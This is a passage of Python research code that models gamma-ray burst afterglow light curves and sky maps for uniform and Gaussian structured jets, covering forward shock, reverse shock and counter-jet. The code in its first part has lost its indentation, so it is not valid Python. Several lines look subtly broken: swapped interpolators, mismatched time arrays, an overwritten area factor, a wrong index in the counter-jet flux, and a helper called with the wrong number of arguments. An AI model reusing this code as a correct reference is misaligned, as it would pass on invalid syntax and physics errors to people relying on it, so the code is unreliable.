filTm = where(tts[filTM]>=min(ttobs))[0]
filTM_cj = where(tts<=max(ttobs_cj))[0]
filTm_cj = where(tts[filTM_cj]>=min(ttobs_cj))[0]
Rint = interp1d(ttobs, self.RRs)
Robs = Rint(tts[filTM][filTm])
GamObs = self.GamInt(Robs)
BetaObs = sqrt(1.-GamObs**(-2.))
#if self.evolution == 'adiabatic':
# onAxisTobs = obsTime_onAxis_adiabatic(Robs, BetaObs)
#elif self.evolution == 'peer':
# onAxisTobs = obsTime_onAxis_integrated(Robs, GamObs, BetaObs)
onAxisTobs = onAxisTint(Robs)
# Forward shock stuff
Bfield = sqrt(32.*pi*self.nn*self.epB*cts.mp)*cts.cc*GamObs
gamMobs, nuMobs = minGam(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield)
gamCobs, nuCobs = critGam(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
Fnuobs = fluxMax(Robs, GamObs, self.nn, Bfield, self.DD)
# Reverse shock stuff
nuM_RS, nuC_RS, Fnu_RS = params_tt_RS(self, onAxisTobs, Rb)
# Counter-jet stuff
Rint_cj = interp1d(ttobs_cj, self.RRs)
Robs_cj = Rint_cj(tts[filTM_cj][filTm_cj])
GamObs_cj = self.GamInt(Robs_cj)
BetaObs_cj = sqrt(1.-GamObs_cj**(-2.))
#onAxisTint = interp1d(self.RRs, self.TTs)
#if self.evolution == 'adiabatic':
# onAxisTobs = obsTime_onAxis_adiabatic(Robs, BetaObs)
#elif self.evolution == 'peer':
# onAxisTobs = obsTime_onAxis_integrated(Robs, GamObs, BetaObs)
onAxisTobs_cj = onAxisTint(Robs_cj)
Bfield_cj = sqrt(32.*pi*self.nn*self.epB*cts.mp)*cts.cc*GamObs_cj
gamMobs_cj, nuMobs_cj = minGam(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj)
gamCobs_cj, nuCobs_cj = critGam(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, onAxisTobs_cj)
Fnuobs_cj = fluxMax(Robs_cj, GamObs_cj, self.nn, Bfield_cj, self.DD)
dopFacs = self.dopplerFactor(calpha[ii], BetaObs)
afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM][filTm], 2.*pi*(1.-cos(1./GamObs)))
dopFacs_cj = self.dopplerFactor(calpha_cj[ii], BetaObs_cj)
afac_cj = self.cellSize/maximum(self.cellSize*ones(num)[filTM_cj][filTm_cj], 2.*pi*(1.-cos(1./GamObs_cj)))
for freq in obsFreqs:
fil1, fil2 = where(gamMobs<=gamCobs)[0], where(gamMobs>gamCobs)[0]
fil3, fil4 = where(nuM_RS<=nuC_RS)[0], where(nuM_RS>nuC_RS)[0]
fil5, fil6 = where(nuMobs_cj<=nuCobs_cj)[0], where(nuMobs_cj>nuCobs_cj)[0]
freqs = freq/dopFacs # Calculate the rest-frame frequencies correspondng to the observed frequency
freqs_cj = freq/dopFacs_cj
light_curve[obsFreqs==freq, filTM[filTm][fil1]] = light_curve[obsFreqs==freq, filTM[filTm][fil1]] + (
afac[fil1] * dopFacs[fil1]**3. * FluxNuSC_arr(self, nuMobs[fil1], nuCobs[fil1], Fnuobs[fil1], freqs[fil1]))*calpha[ii]
#light_curve[obsFreqs==freq, filTM[filTm][fil2]] = light_curve[obsFreqs==freq, filTM[filTm][fil2]] + (
# afac[fil2] * dopFacs[fil2]**3. * FluxNuFC_arr(self, nuMobs[fil2], nuCobs[fil2], Fnuobs[fil2], freqs[fil2]))*calpha[ii]
light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] + (
afac[fil3] * dopFacs[fil3]**3. * FluxNuSC_arr(self, nuM_RS[fil3], nuC_RS[fil3], Fnu_RS[fil3], freqs[fil3]))*calpha[ii]
#light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] + (
# afac[fil4] * dopFacs[fil4]**3. * FluxNuFC_arr(self, nuM_RS[fil4], nuC_RS[fil4], Fnu_RS[fil4], freqs[fil4]))*calpha[ii]
light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] = light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] + (
afac_cj[fil5] * dopFacs_cj[fil5]**3. * FluxNuSC_arr(self, nuMobs_cj[fil5], nuCobs_cj[fil5], Fnuobs_cj[fil5], freqs_cj[fil5]))*calpha_cj[ii]
#return tts, 2.*light_curve, 2.*light_curve_RS
return tts, light_curve, light_curve_RS, light_curve_CJ
def light_curve_peer(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if type(obsFreqs)==float:
obsFreqs = array([obsFreqs])
calpha = self.obsangle(theta_obs)
alpha = arccos(calpha)
calpha_cj = self.obsangle_cj(theta_obs)
alpha_cj = arccos(calpha_cj)
if self.evolution == 'adiabatic':
max_Tobs = max(obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, max(alpha)))/cts.sTd
max_Tobs_cj = max(obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, max(alpha_cj)))/cts.sTd
elif self.evolution == 'peer':
max_Tobs = max(obsTime_offAxis_General(self.RRs, self.TTs, max(alpha)))/cts.sTd
max_Tobs_cj = max(obsTime_offAxis_General(self.RRs, self.TTs, max(alpha_cj)))/cts.sTd
if (ttf>max_Tobs or ttf>max_Tobs_cj):
print("ttf larger than maximum observable time. Adjusting value. ")
ttf = min(max_Tobs, max_Tobs_cj)
lt0 = log10(tt0*cts.sTd) # Convert to seconds and then logspace
ltf = log10(ttf*cts.sTd) # Convert to seconds and then logspace
tts = logspace(lt0, ltf+(ltf-lt0)/num, num) # Timeline on which the flux is evaluated.
light_curve = zeros([len(obsFreqs), num])
light_curve_RS = zeros([len(obsFreqs), num])
light_curve_CJ = zeros([len(obsFreqs), num])
for ii in tqdm(range(self.ncells)):
#for ii in range(self.ncells):
onAxisTint = interp1d(self.RRs, self.TTs)
ttobs = obsTime_offAxis_General(self.RRs, self.TTs, alpha[ii])
ttobs_cj = obsTime_offAxis_General(self.RRs, self.TTs, alpha_cj[ii])
#ttobs = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha[ii])
filTM = where(tts<=max(ttobs))[0]
filTm = where(tts[filTM]>=min(ttobs))[0]
filTM_cj = where(tts<=max(ttobs))[0]
filTm_cj = where(tts[filTM_cj]>=min(ttobs))[0]
#print(len(tts[filT]))
Rint = interp1d(ttobs, self.RRs)
Robs = Rint(tts[filTM][filTm])
GamObs = self.GamInt(Robs)
BetaObs = sqrt(1.-GamObs**(-2.))
#if self.evolution == 'adiabatic':
# onAxisTobs = obsTime_onAxis_adiabatic(Robs, BetaObs)
#elif self.evolution == 'peer':
# onAxisTobs = obsTime_onAxis_integrated(Robs, GamObs, BetaObs)
onAxisTobs = onAxisTint(Robs)
Rint_cj = interp1d(ttobs_cj, self.RRs)
Robs_cj= Rint(tts[filTM_cj][filTm_cj])
GamObs_cj = self.GamInt(Robs_cj)
BetaObs_cj = sqrt(1.-GamObs_cj**(-2.))
onAxisTobs_cj = onAxisTint(Robs_cj)
# Forward shock stuff
#gamMobs, gamCobs = self.gamMI(Robs), self.gamCI(Robs)
#nuMobs, nuCobs = self.nuMI(Robs), self.nuCI(Robs)
#Fnuobs = self.FnuMI(Robs)
#Bfield = sqrt(32.*pi*cts.mp*self.nn*self.epB*GamObs*(GamObs-1.))*cts.cc
Bfield = Bfield_modified(GamObs, BetaObs, self.nn, self.epB)
gamMobs, nuMobs = minGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, self.Xp)
gamCobs, nuCobs = critGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
Fnuobs = fluxMax_modified(Robs, GamObs, self.nn, Bfield, self.DD, self.PhiP)
Bfield_cj = Bfield_modified(GamObs_cj, BetaObs_cj, self.nn, self.epB)
gamMobs_cj, nuMobs_cj = minGam_modified(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, self.Xp)
gamCobs_cj, nuCobs_cj = critGam_modified(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, onAxisTobs_cj)
Fnuobs_cj = fluxMax_modified(Robs_cj, GamObs_cj, self.nn, Bfield_cj, self.DD, self.PhiP)
# Reverse shock stuff
nuM_RS, nuC_RS, Fnu_RS = params_tt_RS(self, onAxisTobs, Rb)
dopFacs = self.dopplerFactor(calpha[ii], BetaObs)
afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM][filTm], 2.*pi*(1.-cos(1./GamObs)))
dopFacs_cj = self.dopplerFactor(calpha_cj[ii], BetaObs_cj)
afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM_cj][filTm_cj], 2.*pi*(1.-cos(1./GamObs_cj)))
for freq in obsFreqs:
fil1, fil2 = where(gamMobs<=gamCobs)[0], where(gamMobs>gamCobs)[0]
fil3, fil4 = where(nuM_RS<=nuC_RS)[0], where(nuM_RS>nuC_RS)[0]
fil5, fil6 = where(nuMobs_cj<=nuCobs_cj)[0], where(nuMobs_cj>nuCobs_cj)[0]
freqs = freq/dopFacs # Calculate the rest-frame frequencies correspondng to the observed frequency
freqs_cj = freq/dopFacs_cj
light_curve[obsFreqs==freq, filTM[filTm][fil1]] = light_curve[obsFreqs==freq, filTM[filTm][fil1]] + (
self.cellSize * (GamObs[fil1]*(1.-BetaObs[fil1]*calpha[ii]))**(-3.) * FluxNuSC_arr(self, nuMobs[fil1], nuCobs[fil1], Fnuobs[fil1], freqs[fil1]))#*calpha[ii]
#light_curve[obsFreqs==freq, filTM[filTm][fil2]] = light_curve[obsFreqs==freq, filTM[filTm][fil2]] + (
# afac[fil2] * dopFacs[fil2]**3. * FluxNuFC_arr(self, nuMobs[fil2], nuCobs[fil2], Fnuobs[fil2], freqs[fil2]))*calpha[ii]
light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] + (
self.cellSize * (GamObs[fil3]*(1.-BetaObs[fil3]*calpha[ii]))**(-3.) * FluxNuSC_arr(self, nuM_RS[fil3], nuC_RS[fil3], Fnu_RS[fil3], freqs[fil3]))#*calpha[ii]
#light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] + (
# afac[fil4] * dopFacs[fil4]**3. * FluxNuFC_arr(self, nuM_RS[fil4], nuC_RS[fil4], Fnu_RS[fil4], freqs[fil4]))*calpha[ii]
light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] = light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] + (
self.cellSize * (GamObs_cj[fil5]*(1.-BetaObs_cj[fil5]*calpha_cj[ii]))**(-3.) * FluxNuSC_arr(self, nuMobs_cj[fil5], nuCobs_cj[fil5], Fnuobs_cj[fil5], freqs_cj[fil3]))#*calpha[ii]
#return tts, 2.*light_curve, 2.*light_curve_RS
return tts, light_curve, light_curve_RS, light_curve_CJ
def lightCurve_interp(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if self.evolution == "adiabatic":
tts, light_curve, light_curve_RS, light_curve_CJ = self.light_curve_adiabatic(theta_obs, obsFreqs, tt0, ttf, num, Rb)
elif self.evolution == "peer":
tts, light_curve, light_curve_RS,light_curve_CJ = self.light_curve_peer(theta_obs, obsFreqs, tt0, ttf, num, Rb)
return tts, light_curve, light_curve_RS, light_curve_CJ
    def skymap(self, theta_obs, tt_obs, freq, nx, ny, xx0, yy0):
        """
        Sky-plane image of the jet and counter-jet at a single observer time.

        Returns the image-plane coordinates (im_xxs, im_yys), per-cell fluxes,
        radii, Lorentz factors, cos(observer angle) and on-axis times.

        NOTE(review): nx, ny, xx0 and yy0 are accepted but never used in this
        method — presumably grid parameters for a later binning step; confirm
        against callers.
        """
        # First half of each array is the jet, second half the counter-jet.
        calpha = zeros([2*self.ncells])
        alpha = zeros([2*self.ncells])
        calpha[:self.ncells] = self.obsangle(theta_obs)
        calpha[self.ncells:] = self.obsangle_cj(theta_obs)
        alpha = arccos(calpha)
        TTs, RRs, Gams, Betas = zeros(2*self.ncells), zeros(2*self.ncells), zeros(2*self.ncells), zeros(2*self.ncells)
        #nuMs, nuCs, fluxes = zeros(2.*self.ncells), zeros(2.*self.ncells), zeros(2.*self.ncells)
        fluxes = zeros(2*self.ncells)
        # Unit image-plane coordinates of each cell; counter-jet cells use
        # the mirrored polar angle pi - cthetas.
        im_xxs, im_yys = zeros(2*self.ncells), zeros(2*self.ncells)
        im_xxs[:self.ncells] = -1.*cos(theta_obs)*sin(self.cthetas)*sin(self.cphis) + sin(theta_obs)*cos(self.cthetas)
        im_yys[:self.ncells] = sin(self.cthetas)*cos(self.cphis)
        im_xxs[self.ncells:] = -1.*cos(theta_obs)*sin(pi-self.cthetas)*sin(self.cphis) + sin(theta_obs)*cos(pi-self.cthetas)
        im_yys[self.ncells:] = sin(pi-self.cthetas)*cos(self.cphis)
        indices = where(im_yys>0)
        if self.evolution == 'adiabatic':
            Tint = interp1d(self.RRs, self.TTs)
            # NOTE(review): where() returns a tuple, so iterating it yields
            # the whole index array once (ii is an array, not a scalar here)
            # — confirm this vectorised single pass is intended; the peer
            # branch below loops over range(self.ncells) instead.
            for ii in tqdm(indices):#tqdm(range(self.ncells)):
                ttobs = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha[ii])
                ttobs_cj = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha[ii+self.ncells])
                # Radius of each cell at the requested observer time.
                Rint = interp1d(ttobs, self.RRs)
                Rint_cj = interp1d(ttobs_cj, self.RRs)
                RRs[ii] = Rint(tt_obs)
                RRs[ii+self.ncells] = Rint_cj(tt_obs)
                TTs[ii], TTs[ii+self.ncells] = Tint(RRs[ii]), Tint(RRs[ii+self.ncells])
                Gams[ii], Gams[ii+self.ncells] = self.GamInt(RRs[ii]), self.GamInt(RRs[ii+self.ncells])
            # Synchrotron parameters for all cells at once.
            Betas = sqrt(1.-Gams**(-2.))
            Bf = (32.*pi*self.nn*self.epB*cts.mp)**(1./2.) * Gams*cts.cc
            gamM, nuM = minGam(Gams, self.epE, self.epB, self.nn, self.pp, Bf)
            gamC, nuC = critGam(Gams, self.epE, self.epB, self.nn, self.pp, Bf, TTs)
            fMax = fluxMax(RRs, Gams, self.nn, Bf, self.DD)
            dopFacs = self.dopplerFactor(calpha, sqrt(1.-Gams**(-2)))
            afac = self.cellSize/maximum(self.cellSize*ones(len(Gams)), 2.*pi*(1.-cos(1./Gams)))
            obsFreqs = freq/dopFacs
            fluxes = (self.DD**2./(calpha*self.cellSize*RRs**2.)) *afac * dopFacs**3. * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)*1./calpha
            #fluxes = afac * dopFacs**3. * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)*calpha
        elif self.evolution == 'peer':
            Tint = interp1d(self.RRs, self.TTs)
            for ii in tqdm(range(self.ncells)):
                ttobs = obsTime_offAxis_General(self.RRs, self.TTs, alpha[ii])
                ttobs_cj = obsTime_offAxis_General(self.RRs, self.TTs, alpha[ii+self.ncells])
                Rint, Rint_cj = interp1d(ttobs, self.RRs), interp1d(ttobs_cj, self.RRs)
                RRs[ii], RRs[ii+self.ncells] = Rint(tt_obs), Rint_cj(tt_obs)
                TTs[ii], TTs[ii+self.ncells] = Tint(RRs[ii]), Tint(RRs[ii+self.ncells])
                Gams[ii], Gams[ii+self.ncells] = self.GamInt(RRs[ii]), self.GamInt(RRs[ii+self.ncells])
            # Modified (Pe'er) synchrotron prescriptions.
            Betas = sqrt(1.-Gams**(-2.))
            Bf = Bfield_modified(Gams, Betas, self.nn, self.epB)
            gamM, nuM = minGam_modified(Gams, self.epE, self.epB, self.nn, self.pp, Bf, self.Xp)
            gamC, nuC = critGam_modified(Gams, self.epE, self.epB, self.nn, self.pp, Bf, TTs)
            fMax = fluxMax_modified(RRs, Gams, self.nn, Bf, self.DD, self.PhiP)
            dopFacs = self.dopplerFactor(calpha, sqrt(1.-Gams**(-2)))
            obsFreqs = freq/dopFacs
            #fluxes = (self.DD/self.cellSize*RRs)**2. * self.cellSize * (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)*1./calpha
            fluxes = (self.DD**2./(calpha*self.cellSize*RRs**2.)) * self.cellSize * (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)
            #fluxes = self.cellSize * (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)#*calpha
        # Scale the unit coordinates by each cell's radius.
        im_xxs = RRs*im_xxs
        im_yys = RRs*im_yys
        return im_xxs, im_yys, fluxes, RRs, Gams, calpha, TTs
class jetHeadGauss(jetHeadUD):
def __init__(self, EE, Gam0, nn, epE, epB, pp, DD, steps, evolution, nlayers, joAngle, coAngle, shell_type='thin', Rb=1.):
# In this case, EE refers to the total energy and Gam0 to the central Gam0 value
self.coAngle = coAngle
jetHeadUD.__init__(self, EE, Gam0, nn, epE, epB, pp, DD, steps, evolution, nlayers, joAngle, shell_type, Rb)
self.__energies_and_LF()
if self.evolution == 'adiabatic':
self.cell_Rds = (3./(4.*pi) * 1./(cts.cc**2.*cts.mp) *
self.cell_EEs/(self.nn*self.cell_Gam0s**2.))**(1./3.)
self.cell_Tds = self.cell_Rds/(cts.cc*self.cell_Beta0s) * (1.-self.cell_Beta0s)
#self.cell_Tds = self.cell_Rds/(2.*cts.cc*self.cell_Gam0s**2.)
#self.Rd/(2.*self.Gam0**2 * cts.cc)
elif self.evolution == 'peer':
self.cell_Rds = (3./(4.*pi) * 1./(cts.cc**2.*cts.mp) *
self.cell_EEs/(self.nn*self.cell_Gam0s**2.))**(1./3.)
self.cell_Tds = self.cell_Rds/(cts.cc*self.cell_Beta0s) * (1.-self.cell_Beta0s)
print("Calculating dynamical evolution")
self.__evolve()
print("Calculating reverse shock parmeters")
self.__peakParamsRS_struc()
def __energies_and_LF(self):
#AngFacs = exp(-1.*self.cthetas**2./(2.*self.coAngle**2.))
self.cell_EEs = self.EE * exp(-1.*self.cthetas**2./(self.coAngle**2.)) # Just for texting
#self.cell_EEs = self.EE * exp(-1.*self.cthetas**2./(self.coAngle**2.))
self.cell_Gam0s = 1.+(self.Gam0-1)*exp(-1.*self.cthetas**2./(2.*self.coAngle**2.))
self.cell_Beta0s = sqrt(1.-(self.cell_Gam0s)**(-2.))
    def __evolve(self):
        """
        Run the dynamical evolution of the structured jet and store the
        radius grid (RRs), Lorentz factors (Gams), velocities (Betas),
        on-axis observer times (TTs) and magnetic field (Bfield), using the
        prescription selected by self.evolution. If self.evolution is
        neither 'peer' nor 'adiabatic', nothing is set.
        """
        if self.evolution == 'peer':
            # Pe'er-style relativistic-adiabatic evolution and modified B-field.
            self.RRs, self.Gams, self.Betas = self.evolve_relad_struct()
            self.TTs = self.obsTime_onAxis_struct()
            self.Bfield = Bfield_modified(self.Gams, self.Betas, self.nn, self.epB)
        elif self.evolution == 'adiabatic':
            # Simple adiabatic (BM-like) scaling with the standard shock B-field.
            self.RRs, self.Gams, self.Betas = self.evolve_ad_struct()
            self.TTs = self.obsTime_onAxis_struct()
            self.Bfield = (32.*pi*cts.mp*self.epB*self.nn)**(1./2.)*self.Gams*cts.cc
    def __peakParamsRS_struc(self):
        """
        Per-cell reverse-shock peak spectral parameters (nuM, nuC, Fnu) at
        the deceleration time of each cell, stored as RSpeak_*_struc
        attributes.

        NOTE(review): only shell_type == 'thin' is handled; for any other
        shell type the stored arrays remain all zeros — confirm whether a
        'thick' branch was intended.
        """
        RSpeak_nuM_struc = zeros(self.ncells)
        RSpeak_nuC_struc = zeros(self.ncells)
        RSpeak_Fnu_struc = zeros(self.ncells)
        if self.shell_type=='thin':
            print("Setting up thin shell")
            for ii in tqdm(range(self.ncells)):
                #self.RSpeak_nuM = 9.6e14 * epE**2. * epB**(1./2.) * nn**(1./2) * Gam0**2.
                #self.RSpeak_nuC = 4.0e16 * epB**(-3./2.) * EE**(-2./3.) * nn**(-5./6.) * Gam0**(4./3.)
                #self.RSpeak_Fnu = 5.2 * DD**(-2.) * epB**(1./2.) * EE * nn**(1./2.) * Gam0
                # Deceleration radius and time of this cell.
                Rd, Td = self.cell_Rds[ii], self.cell_Tds[ii]
                #print Rd
                if self.evolution == 'peer':
                    #print shape(self.RRs), shape(self.Gams)
                    # 'peer' evolution shares a single radius grid across cells.
                    GamsInt = interp1d(self.RRs[:], self.Gams[:,ii])
                    Gam0 = GamsInt(Rd)
                    Beta0 = sqrt(1.-Gam0**(-2.))
                    Bf = Bfield_modified(Gam0, Beta0, self.nn, self.epB)
                    gamM, nuM = minGam_modified(Gam0, self.epE, self.epB, self.nn, self.pp, Bf, self.Xp)
                    gamC, nuC = critGam_modified(Gam0, self.epE, self.epB, self.nn, self.pp, Bf, Td)
                    Fnu = fluxMax_modified(Rd, Gam0, self.nn, Bf, self.DD, self.PhiP)
                elif self.evolution == 'adiabatic':
                    # 'adiabatic' evolution stores a per-cell radius grid.
                    GamsInt = interp1d(self.RRs[:,ii], self.Gams[:,ii])
                    Gam0 = GamsInt(Rd)
                    Bf = (32.*pi*cts.mp*self.epB*self.nn)**(1./2.)*Gam0*cts.cc
                    gamM, nuM = minGam(Gam0, self.epE, self.epB, self.nn, self.pp, Bf)
                    gamC, nuC = critGam(Gam0, self.epE, self.epB, self.nn, self.pp, Bf, Td)
                    Fnu = fluxMax(Rd, Gam0, self.nn, Bf, self.DD)
                #print Rd, max(self.RRs[:,ii]), min(self.RRs[:,ii]), self.cell_Gam0s[ii], self.cthetas[ii]
                #gamM = self.epE*(self.pp-2.)/(self.pp-1.) * cts.mp/cts.me * Gam0
                #gamC = 3.*cts.me/(16.*self.epB*cts.sigT*cts.mp*cts.cc*Gam0**3.*Td*self.nn)
                #nuM = Gam0*gamM**2.*cts.qe*(32.*pi*cts.mp*self.epB*self.nn)**(1./2.)*Gam0*cts.cc/(2.*pi*cts.me*cts.cc)
                #nuC = Gam0*gamC**2.*cts.qe*(32.*pi*cts.mp*self.epB*self.nn)**(1./2.)*Gam0*cts.cc/(2.*pi*cts.me*cts.cc)
                #Fnu = self.nn**(3./2.)*Rd**3. * cts.sigT * cts.cc**3. *cts.me* (32.*pi*cts.mp*self.epB
                #                )**(1./2.)*Gam0**2./(9.*cts.qe*self.DD**2.)
                #RSpeak_nuM_struc[ii]  = nuM/(self.cell_Gam0s[ii]**2.)
                #RSpeak_nuC_struc[ii] = nuC
                #RSpeak_Fnu_struc[ii] =  self.cell_Gam0s[ii] * Fnu
                # RS peak values: nuM is de-boosted by Gam0^2, Fnu boosted by Gam0.
                RSpeak_nuM_struc[ii] = nuM/(Gam0**2)
                RSpeak_nuC_struc[ii] = nuC
                RSpeak_Fnu_struc[ii] = Gam0*Fnu
        self.RSpeak_nuM_struc = RSpeak_nuM_struc #self.Rb**(1./2.)*RSpeak_nuM_struc
        self.RSpeak_nuC_struc = RSpeak_nuC_struc #self.Rb**(-3./2.)*RSpeak_nuC_struc
        self.RSpeak_Fnu_struc = RSpeak_Fnu_struc #self.Rb**(1./2.)*RSpeak_Fnu_struc
    def evolve_relad_struct(self):
        """
        Evolution following Pe'er 2012. Adbaiatic expansion into a cold, uniform ISM using conservation of energy in relativstic form. This solution
        transitions smoothly from the ultra-relativistic to the Newtonian regime. Modified for stuctured jet

        Returns
        -------
        RRs   : 1-D radius grid shared by all cells.
        Gams  : 2-D array (len(RRs), ncells) of Lorentz factors.
        Betas : corresponding velocities.
        """
        Gam0 = self.Gam0
        # Radius grid from well inside the deceleration radius to far beyond
        # the spreading radius Rl.
        Rl = self.Rd * Gam0**(2./3.)
        RRs = logspace(log10(self.Rd/1000.), log10(Rl)+3., self.steps+1) #10
        #MMs = 4.*pi * cts.mp*self.nn*RRs**3./3.#4./3. *pi*cts.mp*self.nn*RRs**3.
        # Swept-up ISM mass at each radius.
        MMs = 4./3. * pi*RRs**3. * self.nn * cts.mp
        #Gams[0,:] = self.cell_Gam0s
        #print("Calculating Gamma as a function of R for each cell")
        print("Calculating dynamical evolution for each layer")
        #for ii in tqdm(range(1,len(self.Betas))):
        #    Gams[ii,:] = rk4(dgdm_struc, self, log10(MMs[ii-1]), Gams[ii-1,:], (log10(MMs[ii])-log10(MMs[ii-1])))
        for ii in tqdm(range(self.nlayers)):
            # Set up initial conditions for the layer
            #GamEv[0] = Gams[0,self.layer==ii+1][0]
            # Ejecta rest mass of this layer from E = Gam0 * M0 * c^2.
            MM0 = self.cell_EEs[self.layer==ii+1][0]/(self.cell_Gam0s[self.layer==ii+1][0]*cts.cc**2.)
            # NOTE(review): the next line is a no-op expression statement
            # (its value is discarded) — presumably leftover debug code.
            self.cell_Gam0s[self.layer==ii+1][0]
            #Gams = zeros(len(RRs))
            GamEv = zeros([len(RRs)])
            GamEv[0] = self.cell_Gam0s[self.layer==ii+1][0]
            # Calculate dynamical evolution of the layer
            # RK4 integration of dGamma/d(log10 M) over the swept-up mass grid.
            for jj in range(1, len(GamEv)):
                GamEv[jj] = rk4(dgdm_mod, MM0, log10(MMs[jj-1]), GamEv[jj-1], (log10(MMs[jj])-log10(MMs[jj-1])))
            # Share the values with the rest of the cells of the layer
            if ii==0:
                Gams = array([GamEv,]).T
            else:
                GamEv = array([GamEv]*self.cellsInLayer(ii)).T
                #Gams = column_stack((Gams, GamEv))
                Gams = concatenate([Gams, GamEv], axis=1)
        Betas = sqrt(1.-1./Gams**2.)
        #Betas[-1] = 0.0
        #print(shape(Gams))
        return RRs, Gams, Betas
    def evolve_ad_struct(self):
        """
        Evolution following simple energy conservation for an adiabatically expanding relativistic shell. Same scaling as
        Blanford-Mckee blastwave solution. This calculation is only valid in ultrarelativstic phase.

        Returns
        -------
        RRs, Gams, Betas : 2-D arrays of shape (steps+1, ncells); each cell
        has its own radius grid ending just before its spreading radius.
        """
        Gam = self.Gam0
        GamSD = 1.021
        Rsd = Gam**(2./3.) *self.Rd / GamSD # Radius at Lorentz factor=1.005 -> after this point use Sedov-Taylor scaling
        Rl = self.Rd * self.Gam0**(2./3.)
        #RRs = logspace(log10(self.Rd/100.), log10(Rl), self.steps+1) #10
        RRs = zeros([self.steps+1, self.ncells])
        Gams = zeros([self.steps+1, self.ncells])
        Betas = zeros([self.steps+1, self.ncells])
        Gams[0,:] = self.cell_Gam0s
        for ii in range(self.ncells):
            # Per-cell grid: coasting below cell_Rds, BM-like Gam ~ R^(-3/2) above.
            RRs[:,ii] = logspace(log10(self.cell_Rds[ii]/100.), log10(0.9999*self.cell_Rds[ii] * self.cell_Gam0s[ii]**(2./3.)), self.steps+1) # All start at same point
            Gams[RRs[:,ii]<=self.cell_Rds[ii],ii] = self.cell_Gam0s[ii]
            Gams[RRs[:,ii]>self.cell_Rds[ii], ii] = (self.cell_Rds[ii]/RRs[RRs[:,ii]>self.cell_Rds[ii],ii])**(3./2.) * self.cell_Gam0s[ii]
            #Gams[RRs>=Rsd] = 1./sqrt( 1.-(Rsd/RRs[RRs>=Rsd])**(6.)*(1.-1./(Gams[(RRs>jet.Rd) & (RRs<Rsd)][-1]**2.)))
            #Gams[RRs>=jet.Rd] = odeint(jet.dgdr, jet.Gam0, RRs[RRs>=jet.Rd])[:,0]
            #Gams[RRs>=jet.Rd] = odeint(jet.dgdr, jet.Gam0, RRs[RRs>=jet.Rd])[:,0]
            Betas[RRs[:,ii]<=self.cell_Rds[ii],ii] = sqrt(1.-(1./self.cell_Gam0s[ii])**2.)
            Betas[RRs[:,ii]>self.cell_Rds[ii], ii] = sqrt(1.-(1./Gams[RRs[:,ii]>self.cell_Rds[ii], ii])**2.)
        # Last grid point forced to rest (end of the relativistic phase).
        Betas[-1,:] = 0.
        #Gams[Gams<=1.] = 1.
        return RRs, Gams, Betas
    def obsTime_onAxis_struct(self):
        """
        On-axis observer times calculated for each individual cell

        Returns TTs with one column per cell; times are computed once per
        layer and copied to every cell of that layer.

        NOTE(review): in the 'adiabatic' branch the layer-0 column is kept
        1-D while later columns are column_stacked, unlike the 'peer'
        branch which reshapes layer 0 with array([TTs,]).T — confirm the
        resulting array shapes agree.
        """
        print("Calculating on-axis observerd time for each cell")
        #for ii in tqdm(range(1,len(self.Betas))):
        if self.evolution == "adiabatic":
            for layer in range(self.nlayers):
                if layer==0:
                    TTs = obsTime_onAxis_adiabatic(self.RRs[:, layer],self.Betas[:, layer])
                else:
                    layerTime = obsTime_onAxis_adiabatic(self.RRs[:, self.layer==layer+1][:,0], self.Betas[:, self.layer==layer+1][:,0])
                    # Duplicate the layer time for every cell of the layer.
                    for cell in range(self.cellsInLayer(layer)):
                        TTs = column_stack((TTs, layerTime))
        elif self.evolution == "peer":
            for layer in tqdm(range(self.nlayers)):
                if layer==0:
                    TTs = obsTime_onAxis_integrated(self.RRs, self.Gams[:, layer], self.Betas[:, layer])
                    TTs = array([TTs,]).T
                else:
                    layerTime = obsTime_onAxis_integrated(self.RRs, self.Gams[:, self.layer==layer+1][:,0],
                                    self.Betas[:, self.layer==layer+1][:,0])
                    #TTs = column_stack((TTs, layerTime))
                    # Duplicate the layer time for every cell of the layer.
                    layerTime = array([layerTime]*self.cellsInLayer(layer)).T
                    TTs = concatenate([TTs, layerTime], axis=1)
        return TTs
def params_tt_RS(self, tt, ii, Rb):
if type(tt) == 'float': tt = array([tt])
fil1, fil2 = where(tt<=self.cell_Tds[ii])[0], where(tt>self.cell_Tds[ii])[0]
#print ii, len(tt)
nuM = zeros(len(tt))
nuC = zeros(len(tt))
